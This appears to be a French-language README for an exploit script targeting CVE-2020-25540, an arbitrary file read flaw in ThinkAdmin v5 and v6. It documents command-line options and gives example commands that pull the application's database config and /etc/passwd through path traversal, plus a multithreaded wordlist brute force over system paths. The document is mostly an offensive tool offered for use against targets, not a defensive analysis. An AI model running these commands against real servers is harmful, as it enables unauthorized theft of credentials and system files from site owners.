
Exploitation de la vulnérabilité de lecture arbitraire de fichiers ThinkAdmin v5 v6, avec prise en charge de la force brute par dictionnaire personnalisable.
Ce script est utilisé pour exploiter la lecture arbitraire de fichiers sur les versions ThinkAdmin v5 et v6
==Le chemin de l'interface peut varier selon les versions (certaines basées sur une réécriture de ThinkAdmin d'origine)==
Utilisation de base
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
[-p PARALLEL]
Lit des fichiers via l'API et récupère la réponse
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Adresse IP ou nom de domaine cible
-f FILE, --file FILE Chemin du fichier à lire
-w WORDLIST, --wordlist WORDLIST
Chemin du fichier dictionnaire, fournit plusieurs chemins de fichiers ou noms de fichiers
-b BASE_PATH, --base-path BASE_PATH
Chemin de base, utilisé pour concaténer les chemins du fichier dictionnaire
-p PARALLEL, --parallel PARALLEL
Nombre de threads parallèles
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10